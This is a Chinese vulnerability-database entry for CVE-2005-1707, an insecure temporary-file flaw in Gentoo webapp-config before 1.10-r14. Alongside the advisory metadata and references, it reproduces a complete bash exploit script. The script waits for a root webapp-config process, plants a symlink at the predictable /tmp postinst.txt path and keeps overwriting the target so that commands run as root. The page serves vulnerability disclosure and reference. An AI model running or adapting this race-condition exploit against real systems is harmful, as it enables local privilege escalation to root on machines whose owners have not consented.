Gentoo Webapp-Config不安全文件创建漏洞-安全小百科

Gentoo Webapp-Config不安全文件创建漏洞

漏洞ID	1108811	漏洞类型	设计错误
发布时间	2005-05-26	更新时间	2005-10-20
CVE编号	CVE-2005-1707	CNNVD-ID	CNNVD-200505-1183
漏洞平台	Linux	CVSS评分	4.6

|漏洞来源

https://www.exploit-db.com/exploits/25709
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1183

|漏洞详情

Gentoowebapp-config的1.10-r14之前版本中的fn_show_postinst函数允许本地用户通过对postinst.txt临时文件的symlink攻击来重写任意文件。

|漏洞EXP

source: http://www.securityfocus.com/bid/13780/info

Gentoo webapp-config is prone to an insecure file creation vulnerability. This issue is due to a design error that causes the application to fail to verify the existence of a file before writing to it.

An attacker may leverage this issue to cause arbitrary shell commands to be executed with superuser privileges. 

#!/bin/bash

# Eric Romang aka wow ([email protected])
# webapp-config race condition how permit execution of arbitrary command with root privileges
# work with < webapp-config 1.10-r14

rm -f webapp-config_trace.txt fake_tmp_file /tmp/*.postinst.txt
touch ~/fake_tmp_file

echo "0" > webapp-config_trace.txt
status=`cat webapp-config_trace.txt`
echo "Waiting for webapp-config execution..."

while [ "$status" == 0 ]
do
	ps auxw|grep webapp-config|grep root 
	if [ "$?" == 0 ]
	then
		echo "1" > webapp-config_trace.txt
	fi
	status=`cat webapp-config_trace.txt`
done

echo "Process caught !"
process_id=`pgrep -u root webapp-config`
ln -s ~/fake_tmp_file /tmp/$process_id.postinst.txt
echo "fake_file_created!"
echo "we force the file to be overwritten"

echo "0" > webapp-config_trace.txt
status=`cat webapp-config_trace.txt`
echo "Waiting the end of webapp-config"
echo "during all the configuration we force the file to be overwritten"
while [ "$status" == 0 ]
do
	ps auxw|grep webapp-config|grep root
	if [ "$?" == 1 ]
	then
		echo "1" > webapp-config_trace.txt
	else
		echo "echo premature end of script; exit 1;" > ~/fake_tmp_file
	fi
	status=`cat webapp-config_trace.txt`
done
echo "end of webapp-config"

|参考资料

来源:SECTRACK
名称:1014027
链接:http://securitytracker.com/id?1014027
来源:MISC
链接:http://www.zataz.net/adviso/webapp-config-05182005.txt
来源:BID
名称:13780
链接:http://www.securityfocus.com/bid/13780
来源:OSVDB
名称:16746
链接:http://www.osvdb.org/16746
来源:GENTOO
名称:GLSA-200506-13
链接:http://www.gentoo.org/security/en/glsa/glsa-200506-13.xml
来源:VUPEN
名称:ADV-2005-0809
链接:http://www.frsirt.com/english/advisories/2005/0809
来源:SECUNIA
名称:15445
链接:http://secunia.com/advisories/15445
来源:MISC
链接:http://bugs.gentoo.org/show_bug.cgi?id=91785

相关推荐: Gnu Transport Layer Security Library X.509 Certificate Verification Denial Of Service Vulnerability

Gnu Transport Layer Security Library X.509 Certificate Verification Denial Of Service Vulnerability 漏洞ID 1098158 漏洞类型 Design Error…

文章版权归作者所有，未经允许请勿转载。

THE END